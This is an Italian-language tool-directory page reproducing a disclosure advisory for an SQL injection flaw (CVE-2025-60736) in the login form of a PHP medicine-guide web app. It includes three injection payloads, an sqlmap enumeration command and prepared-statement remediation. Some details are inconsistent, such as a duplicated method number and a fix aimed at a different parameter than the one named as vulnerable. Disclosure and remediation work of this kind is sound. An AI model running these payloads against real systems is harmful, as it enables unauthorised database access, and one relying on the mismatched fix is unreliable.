Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-60736 — code-projects Online Medicine Guide 1.0 è vulnerabile a SQL Injection | Kitploit
Strumenti/GitHubGitHub/nxvh1337/cve-2025-60736
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubnxvh1337/cve-2025-60736

CVE-2025-60736

code-projects Online Medicine Guide 1.0 è vulnerabile a SQL Injection

Vedi Repository
110 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-60736: Vulnerabilità di SQL Injection nella Guida Medica Online

Riepilogo Esecutivo

Questo documento descrive una vulnerabilità critica di SQL injection scoperta nell'applicazione web Guida Medica Online. La vulnerabilità consente un accesso non autorizzato al database e comporta rischi significativi per la sicurezza dell'applicazione e dei suoi utenti.

Sottomittente

  • Noah "nxvh" Heraud

1. Informazioni sul Prodotto

Prodotto Interessato

  • Nome del Prodotto: Guida Medica Online
  • Fornitore: Code Projects
  • Homepage del Fornitore: https://code-projects.org/online-medicine-guide-in-php-css-javascript-and-mysql-free-download/
  • Versione Interessata: v1.0
  • File Vulnerabile: /login.php
  • Tipo di Software: Applicazione Web (PHP/MySQL)
  • Dettagli Tecnici

    • Linguaggio di Programmazione: PHP
    • Database: MySQL
    • Frontend: CSS, JavaScript
    • Architettura: Stack LAMP/WAMP

    2. Dettagli sulla Vulnerabilità

    Classificazione della Vulnerabilità

    • ID CVE: CVE-2025-60736
    • Tipo di Vulnerabilità: SQL Injection
    • Gravità: Critica
    • Punteggio CVSS: 9.8 (Critica)
    • Vettore di Attacco: Rete
    • Complessità dell'Attacco: Bassa
    • Privilegi Richiesti: Nessuno
    • Interazione dell'Utente: Nessuna
    • Ambito: Modificato

    Analisi della Causa Principale

    La vulnerabilità deriva da una validazione e sanificazione insufficiente dell'input nel file /login.php. L'applicazione concatena direttamente l'input dell'utente dal parametro upass nelle query SQL senza una sanificazione adeguata o istruzioni preparate.

    Causa Principale Tecnica:

    • Concatenazione diretta di stringhe nelle query SQL
    • Mancanza di validazione e sanificazione dell'input
    • Implementazione mancante di istruzioni preparate
    • Binding dei parametri insufficiente

    3. Prova di Concetto

    Posizione della Vulnerabilità

    • File: /login.php
    • Parametro: upass (POST)
    • Vettore di Attacco: Manipolazione della richiesta HTTP POST

    Metodi di Sfruttamento

    Metodo 1: SQL Injection Basata su Booleani

    root@kitploit:~
    POST /login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx
    

    Metodo 1: SQL Injection Basata su Errori

    root@kitploit:~
    POST /login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp
    

    Metodo 2: SQL Injection Blind Basata sul Tempo

    root@kitploit:~
    POST /login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa
    

    Test Automatici

    La vulnerabilità è stata confermata utilizzando sqlmap:

    root@kitploit:~
    sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs
    

    prova dello sfruttamento

    4. Piano di Rimedio

    Azioni Immediate

    1. Patch di Emergenza: Implementare la validazione dell'input per il parametro upass
    2. Monitoraggio del Database: Abilitare la registrazione completa per attività sospette
    3. Restrizione degli Accessi: Implementare il rate limiting e restrizioni basate su IP
    4. Audit di Sicurezza: Condurre una valutazione di sicurezza immediata

    5. Rimedio Tecnico

    Esempio di Correzione del Codice

    Prima (Vulnerabile):

    root@kitploit:~
    $query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";
    

    Dopo (Sicuro):

    root@kitploit:~
    $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
    $stmt->execute([$_POST['uname']]);
    

    Implementazione delle Best Practice di Sicurezza

    1. Istruzioni Preparate: Utilizzare esclusivamente query parametrizzate
    2. Validazione dell'Input: Implementare la validazione basata su whitelist
    3. Codifica dell'Output: Codificare correttamente tutti i dati di output
    4. Gestione degli Errori: Implementare una gestione sicura degli errori senza divulgazione di informazioni
    5. Controlli di Accesso: Implementare autenticazione e autorizzazione adeguate

    Versione del Documento: 1.0
    Ultimo Aggiornamento: 03/10/2025 (gg/mm/aaaa)

    Scarica lo strumento